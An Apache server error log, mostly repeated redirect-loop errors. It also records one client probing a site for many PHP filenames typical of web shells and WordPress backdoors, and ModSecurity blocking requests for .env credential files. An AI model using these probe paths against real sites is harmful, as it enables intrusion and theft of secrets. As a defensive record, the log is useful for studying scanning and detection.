[Mon May 11 13:24:22.502871 2026] [core:error] [pid 1320674:tid 1320692] [client 20.151.0.198:56857] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:24:22.502909 2026] [core:error] [pid 1320674:tid 1320692] [client 20.151.0.198:56857] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:24:24.878742 2026] [core:error] [pid 1319885:tid 1319927] [client 20.151.0.198:15145] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:24:24.878921 2026] [core:error] [pid 1319885:tid 1319927] [client 20.151.0.198:15145] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:24:25.556428 2026] [core:error] [pid 1319998:tid 1320020] [client 20.151.0.198:14406] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:24:25.556461 2026] [core:error] [pid 1319998:tid 1320020] [client 20.151.0.198:14406] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:24:26.459086 2026] [core:error] [pid 1319886:tid 1319917] [client 20.151.0.198:53660] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:24:26.459113 2026] [core:error] [pid 1319886:tid 1319917] [client 20.151.0.198:53660] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:24:28.916618 2026] [core:error] [pid 1319885:tid 1319898] [client 20.151.0.198:15067] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:24:28.916720 2026] [core:error] [pid 1319885:tid 1319898] [client 20.151.0.198:15067] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:24:31.289900 2026] [core:error] [pid 1319885:tid 1319915] [client 20.151.0.198:15060] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:24:31.289950 2026] [core:error] [pid 1319885:tid 1319915] [client 20.151.0.198:15060] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:24:33.088650 2026] [core:error] [pid 1319886:tid 1319905] [client 20.151.0.198:56875] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:24:33.088686 2026] [core:error] [pid 1319886:tid 1319905] [client 20.151.0.198:56875] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:24:37.000827 2026] [core:error] [pid 1320398:tid 1320412] [client 20.151.0.198:56854] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:24:37.000854 2026] [core:error] [pid 1320398:tid 1320412] [client 20.151.0.198:56854] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:24:39.591668 2026] [core:error] [pid 1320398:tid 1320423] [client 20.151.0.198:14461] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:24:39.591696 2026] [core:error] [pid 1320398:tid 1320423] [client 20.151.0.198:14461] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:24:46.539996 2026] [core:error] [pid 1319886:tid 1319916] [client 20.151.0.198:15120] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:24:46.540108 2026] [core:error] [pid 1319886:tid 1319916] [client 20.151.0.198:15120] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:24:52.758671 2026] [core:error] [pid 1320674:tid 1320708] [client 20.151.0.198:14837] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:24:52.758714 2026] [core:error] [pid 1320674:tid 1320708] [client 20.151.0.198:14837] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:24:58.141097 2026] [core:error] [pid 1320674:tid 1320713] [client 20.151.0.198:51551] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:24:58.141129 2026] [core:error] [pid 1320674:tid 1320713] [client 20.151.0.198:51551] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:25:05.143545 2026] [core:error] [pid 1320674:tid 1320693] [client 20.151.0.198:14428] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:25:05.143576 2026] [core:error] [pid 1320674:tid 1320693] [client 20.151.0.198:14428] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:25:09.259759 2026] [core:error] [pid 1319886:tid 1319906] [client 20.151.0.198:56850] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:25:09.259782 2026] [core:error] [pid 1319886:tid 1319906] [client 20.151.0.198:56850] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:25:12.079215 2026] [core:error] [pid 1320398:tid 1320422] [client 20.151.0.198:56880] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:25:12.079252 2026] [core:error] [pid 1320398:tid 1320422] [client 20.151.0.198:56880] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:25:15.721277 2026] [autoindex:error] [pid 1320398:tid 1320408] [client 185.242.226.16:41965] AH01276: Cannot serve directory /home/totalcloud/public_html/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Mon May 11 13:25:16.267993 2026] [ssl:error] [pid 1319885:tid 1319904] (EAI 2)Name or service not known: [client 172.225.189.224:29557] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 13:25:16.268267 2026] [ssl:error] [pid 1319885:tid 1319904] AH01941: stapling_renew_response: responder error
[Mon May 11 13:25:17.083553 2026] [core:error] [pid 1319885:tid 1319930] [client 20.151.0.198:51539] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:25:17.083592 2026] [core:error] [pid 1319885:tid 1319930] [client 20.151.0.198:51539] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:25:18.994134 2026] [:error] [pid 1319885:tid 1319907] [client 4.193.137.131:4686] File does not exist: /home/nearoofr/public_html/file.php
[Mon May 11 13:25:19.164358 2026] [:error] [pid 1319885:tid 1319907] [client 4.193.137.131:4686] File does not exist: /home/nearoofr/public_html/gettest.php
[Mon May 11 13:25:19.334359 2026] [:error] [pid 1319885:tid 1319907] [client 4.193.137.131:4686] File does not exist: /home/nearoofr/public_html/gg.php
[Mon May 11 13:25:19.504091 2026] [:error] [pid 1319885:tid 1319907] [client 4.193.137.131:4686] File does not exist: /home/nearoofr/public_html/goods.php
[Mon May 11 13:25:19.676887 2026] [:error] [pid 1319885:tid 1319907] [client 4.193.137.131:4686] File does not exist: /home/nearoofr/public_html/maintenance.php
[Mon May 11 13:25:19.846867 2026] [:error] [pid 1319885:tid 1319907] [client 4.193.137.131:4686] File does not exist: /home/nearoofr/public_html/info.php
[Mon May 11 13:25:20.033244 2026] [:error] [pid 1319885:tid 1319907] [client 4.193.137.131:4686] File does not exist: /home/nearoofr/public_html/users.php
[Mon May 11 13:25:20.210193 2026] [:error] [pid 1319885:tid 1319907] [client 4.193.137.131:4686] File does not exist: /home/nearoofr/public_html/install.php
[Mon May 11 13:25:20.385759 2026] [:error] [pid 1319885:tid 1319907] [client 4.193.137.131:4686] File does not exist: /home/nearoofr/public_html/item.php
[Mon May 11 13:25:20.555790 2026] [:error] [pid 1319885:tid 1319907] [client 4.193.137.131:4686] File does not exist: /home/nearoofr/public_html/jga.php
[Mon May 11 13:25:20.725698 2026] [:error] [pid 1319885:tid 1319907] [client 4.193.137.131:4686] File does not exist: /home/nearoofr/public_html/leaf.php
[Mon May 11 13:25:20.899818 2026] [:error] [pid 1319885:tid 1319907] [client 4.193.137.131:4686] File does not exist: /home/nearoofr/public_html/ms-files.php
[Mon May 11 13:25:21.069617 2026] [:error] [pid 1319885:tid 1319907] [client 4.193.137.131:4686] File does not exist: /home/nearoofr/public_html/lock.php
[Mon May 11 13:25:21.239331 2026] [:error] [pid 1319885:tid 1319907] [client 4.193.137.131:4686] File does not exist: /home/nearoofr/public_html/wp-blog-header.php
[Mon May 11 13:25:21.251428 2026] [core:error] [pid 1320398:tid 1320422] [client 20.151.0.198:56850] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:25:21.251449 2026] [core:error] [pid 1320398:tid 1320422] [client 20.151.0.198:56850] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:25:21.409255 2026] [:error] [pid 1319885:tid 1319907] [client 4.193.137.131:4686] File does not exist: /home/nearoofr/public_html/lock360.php
[Mon May 11 13:25:21.579181 2026] [:error] [pid 1319885:tid 1319907] [client 4.193.137.131:4686] File does not exist: /home/nearoofr/public_html/log.php
[Mon May 11 13:25:21.749028 2026] [:error] [pid 1319885:tid 1319907] [client 4.193.137.131:4686] File does not exist: /home/nearoofr/public_html/manager.php
[Mon May 11 13:25:21.919067 2026] [:error] [pid 1319885:tid 1319907] [client 4.193.137.131:4686] File does not exist: /home/nearoofr/public_html/meta.php
[Mon May 11 13:25:22.088859 2026] [:error] [pid 1319885:tid 1319907] [client 4.193.137.131:4686] File does not exist: /home/nearoofr/public_html/mini.php
[Mon May 11 13:25:22.258604 2026] [:error] [pid 1319885:tid 1319907] [client 4.193.137.131:4686] File does not exist: /home/nearoofr/public_html/mjq.php
[Mon May 11 13:25:22.428595 2026] [:error] [pid 1319885:tid 1319907] [client 4.193.137.131:4686] File does not exist: /home/nearoofr/public_html/new.php
[Mon May 11 13:25:22.598502 2026] [:error] [pid 1319885:tid 1319907] [client 4.193.137.131:4686] File does not exist: /home/nearoofr/public_html/onclickfuns.php
[Mon May 11 13:25:22.768363 2026] [:error] [pid 1319885:tid 1319907] [client 4.193.137.131:4686] File does not exist: /home/nearoofr/public_html/option.php
[Mon May 11 13:25:22.938794 2026] [:error] [pid 1319885:tid 1319907] [client 4.193.137.131:4686] File does not exist: /home/nearoofr/public_html/plugin-editor.php
[Mon May 11 13:25:23.108987 2026] [:error] [pid 1319885:tid 1319907] [client 4.193.137.131:4686] File does not exist: /home/nearoofr/public_html/profile.php
[Mon May 11 13:25:23.278911 2026] [:error] [pid 1319885:tid 1319907] [client 4.193.137.131:4686] File does not exist: /home/nearoofr/public_html/qw_03b4ad31.php
[Mon May 11 13:25:23.471515 2026] [:error] [pid 1319885:tid 1319907] [client 4.193.137.131:4686] File does not exist: /home/nearoofr/public_html/radio.php
[Mon May 11 13:25:23.641521 2026] [:error] [pid 1319885:tid 1319907] [client 4.193.137.131:4686] File does not exist: /home/nearoofr/public_html/sf.php
[Mon May 11 13:25:23.811585 2026] [:error] [pid 1319885:tid 1319907] [client 4.193.137.131:4686] File does not exist: /home/nearoofr/public_html/simple.php
[Mon May 11 13:25:23.991490 2026] [:error] [pid 1319885:tid 1319907] [client 4.193.137.131:4686] File does not exist: /home/nearoofr/public_html/sql.php
[Mon May 11 13:25:24.161427 2026] [:error] [pid 1319885:tid 1319907] [client 4.193.137.131:4686] File does not exist: /home/nearoofr/public_html/test.php
[Mon May 11 13:25:24.331329 2026] [:error] [pid 1319885:tid 1319907] [client 4.193.137.131:4686] File does not exist: /home/nearoofr/public_html/test1.php
[Mon May 11 13:25:24.530710 2026] [:error] [pid 1319885:tid 1319907] [client 4.193.137.131:4686] File does not exist: /home/nearoofr/public_html/themes.php
[Mon May 11 13:25:24.688200 2026] [core:error] [pid 1319885:tid 1319927] [client 20.151.0.198:51523] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:25:24.688223 2026] [core:error] [pid 1319885:tid 1319927] [client 20.151.0.198:51523] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:25:24.880335 2026] [:error] [pid 1319885:tid 1319907] [client 4.193.137.131:4686] File does not exist: /home/nearoofr/public_html/wp-admin.php
[Mon May 11 13:25:25.446198 2026] [:error] [pid 1319885:tid 1319907] [client 4.193.137.131:4686] File does not exist: /home/nearoofr/public_html/wp-blog-header.php
[Mon May 11 13:25:25.617529 2026] [:error] [pid 1319885:tid 1319907] [client 4.193.137.131:4686] File does not exist: /home/nearoofr/public_html/wp-config-sample.php
[Mon May 11 13:25:26.857259 2026] [:error] [pid 1319885:tid 1319907] [client 4.193.137.131:4686] File does not exist: /home/nearoofr/public_html/wp.php
[Mon May 11 13:25:27.355100 2026] [:error] [pid 1319885:tid 1319907] [client 4.193.137.131:4686] File does not exist: /home/nearoofr/public_html/xmlrpc.php
[Mon May 11 13:25:28.204929 2026] [core:error] [pid 1320398:tid 1320401] [client 20.151.0.198:51538] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:25:28.204962 2026] [core:error] [pid 1320398:tid 1320401] [client 20.151.0.198:51538] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:25:29.590509 2026] [core:error] [pid 1320398:tid 1320414] [client 20.151.0.198:56886] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:25:29.590541 2026] [core:error] [pid 1320398:tid 1320414] [client 20.151.0.198:56886] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:25:34.428014 2026] [core:error] [pid 1320398:tid 1320424] [client 20.151.0.198:56840] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:25:34.428046 2026] [core:error] [pid 1320398:tid 1320424] [client 20.151.0.198:56840] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:25:37.133264 2026] [core:error] [pid 1319998:tid 1320021] [client 20.151.0.198:56884] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:25:37.133303 2026] [core:error] [pid 1319998:tid 1320021] [client 20.151.0.198:56884] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:25:45.038066 2026] [core:error] [pid 1320398:tid 1320416] [client 20.151.0.198:56844] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:25:45.038096 2026] [core:error] [pid 1320398:tid 1320416] [client 20.151.0.198:56844] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:25:49.719107 2026] [core:error] [pid 1319886:tid 1319929] [client 20.151.0.198:15076] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:25:49.719138 2026] [core:error] [pid 1319886:tid 1319929] [client 20.151.0.198:15076] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:25:55.662327 2026] [core:error] [pid 1319998:tid 1320005] [client 20.151.0.198:53645] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:25:55.662574 2026] [core:error] [pid 1319998:tid 1320005] [client 20.151.0.198:53645] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:26:04.475916 2026] [core:error] [pid 1319885:tid 1319892] [client 20.151.0.198:15156] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:26:04.475946 2026] [core:error] [pid 1319885:tid 1319892] [client 20.151.0.198:15156] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:26:09.779793 2026] [core:error] [pid 1319885:tid 1319900] [client 20.151.0.198:53694] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:26:09.779973 2026] [core:error] [pid 1319885:tid 1319900] [client 20.151.0.198:53694] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:26:14.139558 2026] [core:error] [pid 1319953:tid 1319956] [client 20.151.0.198:14441] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:26:14.139583 2026] [core:error] [pid 1319953:tid 1319956] [client 20.151.0.198:14441] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:26:17.443517 2026] [core:error] [pid 1319953:tid 1319958] [client 20.151.0.198:14771] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:26:17.443546 2026] [core:error] [pid 1319953:tid 1319958] [client 20.151.0.198:14771] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:26:21.195694 2026] [security2:error] [pid 1319886:tid 1319909] [client 162.158.110.22:12310] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "krakoukas.com"] [uri "/.env.production"] [unique_id "agG83ay-5-wpj6Sx56ZyogAAAAc"], referer: https://www.google.com/search?q=krakoukas.com
[Mon May 11 13:26:21.196106 2026] [security2:error] [pid 1319886:tid 1319909] [client 162.158.110.22:12310] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "krakoukas.com"] [uri "/.env.production"] [unique_id "agG83ay-5-wpj6Sx56ZyogAAAAc"], referer: https://www.google.com/search?q=krakoukas.com
[Mon May 11 13:26:21.604658 2026] [security2:error] [pid 1319953:tid 1319963] [client 172.69.150.143:9911] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "krakoukas.com"] [uri "/.env"] [unique_id "agG83eSQ-m-m0ukSShtbfwAAAUg"]
[Mon May 11 13:26:21.604905 2026] [security2:error] [pid 1319953:tid 1319963] [client 172.69.150.143:9911] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "krakoukas.com"] [uri "/.env"] [unique_id "agG83eSQ-m-m0ukSShtbfwAAAUg"]
[Mon May 11 13:26:21.691653 2026] [security2:error] [pid 1319886:tid 1319913] [client 172.70.248.24:13770] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "krakoukas.com"] [uri "/.env.local"] [unique_id "agG83ay-5-wpj6Sx56ZypAAAAAk"], referer: https://www.google.com/search?q=krakoukas.com
[Mon May 11 13:26:21.691932 2026] [security2:error] [pid 1319886:tid 1319913] [client 172.70.248.24:13770] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "krakoukas.com"] [uri "/.env.local"] [unique_id "agG83ay-5-wpj6Sx56ZypAAAAAk"], referer: https://www.google.com/search?q=krakoukas.com
[Mon May 11 13:26:21.695543 2026] [security2:error] [pid 1319998:tid 1320016] [client 172.71.144.156:11724] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.development"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "krakoukas.com"] [uri "/.env.development"] [unique_id "agG83at2WtvoFr7xvGyuNwAAAJA"], referer: https://www.google.com/search?q=krakoukas.com
[Mon May 11 13:26:21.695776 2026] [security2:error] [pid 1319998:tid 1320016] [client 172.71.144.156:11724] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "krakoukas.com"] [uri "/.env.development"] [unique_id "agG83at2WtvoFr7xvGyuNwAAAJA"], referer: https://www.google.com/search?q=krakoukas.com
[Mon May 11 13:26:21.696540 2026] [core:error] [pid 1319886:tid 1319906] [client 20.151.0.198:61198] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:26:21.696569 2026] [core:error] [pid 1319886:tid 1319906] [client 20.151.0.198:61198] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
